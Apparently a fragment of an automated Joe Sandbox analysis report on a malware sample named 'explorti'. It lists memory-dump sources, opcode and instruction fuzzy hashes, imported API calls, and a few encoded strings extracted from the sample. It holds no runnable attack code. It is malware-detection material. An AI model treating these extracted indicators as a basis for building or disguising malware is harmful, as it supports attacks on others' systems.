                                                                  • Instruction ID: 9291084dc57dc315b3e5d43b262c78441fa0462146906557ab833ed8d42c2fd4
                                                                  • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                                                  • Instruction Fuzzy Hash: 56F12F71E4121A9BDF18CF58C8946EEBBB6FF88314F158269D819A7384D731AE41CB90
                                                                  APIs
                                                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,005DCE55,?,?,?,?,005DCE8A,?,?,?,?,?,?,005DC400,?,00000001), ref: 005DCB06
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Time$FilePreciseSystem
                                                                  • String ID:
                                                                  • API String ID: 1802150274-0
                                                                  • Opcode ID: 322bb40ceff9233728d5c3258537178c75e5678a25acd0a920a6953f2df35d19
                                                                  • Instruction ID: 5eb8f079f404f407704885f5a6550e1048a397b8e52e2e57f4c0ee71cdcec56f
                                                                  • Opcode Fuzzy Hash: 322bb40ceff9233728d5c3258537178c75e5678a25acd0a920a6953f2df35d19
                                                                  • Instruction Fuzzy Hash: 6ED02233A4383853CF352B88BC188ACBF29EB05B603545023E80613220CA70DC41ABD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f15bb4b0ff1a3c6d133e78680f95b552244e1ca82a3227356aec965d4a2f822c
                                                                  • Instruction ID: 0b6972e5665b0a35d068ccd44c36da4d02735b6d9db81f994b80376c7a161bb8
                                                                  • Opcode Fuzzy Hash: f15bb4b0ff1a3c6d133e78680f95b552244e1ca82a3227356aec965d4a2f822c
                                                                  • Instruction Fuzzy Hash: 7B2260B3F515144BDB4CCB9DDCA27ECB2E3AFD8214B0E903DA40AE3345EA79D9158684
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee419a85da85663d4073c078084ad19c4fe87db3fb88f8617463854c716be19f
                                                                  • Instruction ID: 8068d08886bdc5d9b26893af88ae264307442afb4d3106c4d984689167c21baf
                                                                  • Opcode Fuzzy Hash: ee419a85da85663d4073c078084ad19c4fe87db3fb88f8617463854c716be19f
                                                                  • Instruction Fuzzy Hash: B2B16D71654605DFD718CF28C486B967BA2FF05364F298698E89ACF3E1C335E992CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                  • Instruction ID: b789df13ab0b54fc53ab1ce6e79befe9b4a147dc67d5b5dd1f75e51ea0304b13
                                                                  • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                  • Instruction Fuzzy Hash: E551257060CA4D56DF389A3C889A7BE6F9EBF4D300F54089AD742D7782DB1D9D44C262
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ab4d29c6148408b88be557ba9888c4387fe23d6617fa5d578f91c093f380f6e
                                                                  • Instruction ID: d6ae6dd514eadf2fec14c20ae7b734d0a202e40aa6df09da50ec9026a330acca
                                                                  • Opcode Fuzzy Hash: 6ab4d29c6148408b88be557ba9888c4387fe23d6617fa5d578f91c093f380f6e
                                                                  • Instruction Fuzzy Hash: F95192716087918FD329CF2D842567ABFE2BF96200F084A9EE0D687392D775D908CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fba2525e024fb453b53cc28beeade1823fbccbb2609ed981186f957b71867a8
                                                                  • Instruction ID: fef9d23c9ac940a1b595596080359866a7bf54a65ca2761abd864566c0256264
                                                                  • Opcode Fuzzy Hash: 8fba2525e024fb453b53cc28beeade1823fbccbb2609ed981186f957b71867a8
                                                                  • Instruction Fuzzy Hash: F121D673F2083947770CC47E8C5327DB6E1C68C600745823EF8A6EA2C1D968D917E2E4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 48b080e6bda243ce4fc7470824b169a72b758d911a02d5d16353d53c17ab68f1
                                                                  • Instruction ID: 5f2a6765584b1194533e8621f8fbd6f1b3ffd3726395417aabeca0a2aa0d76ac
                                                                  • Opcode Fuzzy Hash: 48b080e6bda243ce4fc7470824b169a72b758d911a02d5d16353d53c17ab68f1
                                                                  • Instruction Fuzzy Hash: 2211A723F30C255A675C816D8C1727AA1D3DBD825031F533AD827E72C4E9A4DE13D290
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction ID: 66439193cd2440ecf561cf6fd980b06f553da94b1974dd177ff705d320cae36f
                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction Fuzzy Hash: 8011E67B2801828FD61CCA2DD8B86FFA797EAC532073C437AD1C24B7DCDB2299459600
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bda3a817fc78e461534d433921cbf0e65aa9c41fc3a822975263b326a15f1244
                                                                  • Instruction ID: 121d00373b5915b497b2eabf4892fe76da9c8600d75ee341aa859c585ae41075
                                                                  • Opcode Fuzzy Hash: bda3a817fc78e461534d433921cbf0e65aa9c41fc3a822975263b326a15f1244
                                                                  • Instruction Fuzzy Hash: D4E08C3015160C6EDF297B14C88CEA93F6AFF92740F104800FA084A632CB2AED81C591
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                  • Instruction ID: 41a73df5f1e6e98bc7d5469d237ac82bd8018f174b58f7223d6e87f036092dbd
                                                                  • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                  • Instruction Fuzzy Hash: 1AE04672911228EBCB24EB88C908D9AF6ACFB88B00F120496B605E3250C374DE00C7D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 246122658369$Ip==$Krkk$Zww=$aAJTazgvOn==$invalid stoi argument$stoi argument out of range
                                                                  • API String ID: 0-3898363485
                                                                  • Opcode ID: 33bcd4745ced205e2b53a0955388d50af38b50cc29eb0b1892d66d524bfe33e9
                                                                  • Instruction ID: 5ec3b72089fb3b95f13f508af6b3ceb00bafc25cbce14491c2c636648d19ff85
                                                                  • Opcode Fuzzy Hash: 33bcd4745ced205e2b53a0955388d50af38b50cc29eb0b1892d66d524bfe33e9
                                                                  • Instruction Fuzzy Hash: 3302AF70900249EFEF24DFA8C849BDEBFB5BF45304F50455AE805A7382D7759A84CBA2
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 005F4787
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 005F478F
                                                                  • _ValidateLocalCookies.LIBCMT ref: 005F4818
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 005F4843
                                                                  • _ValidateLocalCookies.LIBCMT ref: 005F4898
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: `8_$csm
                                                                  • API String ID: 1170836740-2635976903
                                                                  • Opcode ID: acf5484e20cc126172d49d418a62172dcbc604783c20e55f04153b8dddf04f48
                                                                  • Instruction ID: 4f6e082fb149f515edbe318ff5b393484e45dbf4caeb0f06b6ff209008c23cca
                                                                  • Opcode Fuzzy Hash: acf5484e20cc126172d49d418a62172dcbc604783c20e55f04153b8dddf04f48
                                                                  • Instruction Fuzzy Hash: D451B034A0024D9BCF10DF68C884ABF7FA6FF45364F148095EA159B352D73AAA56CF90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                  • String ID:
                                                                  • API String ID: 57040152-0
                                                                  • Opcode ID: d74347e8e2a3abc78d07dff3a200588cf5cf38563359e4588214b8e5ccaefc37
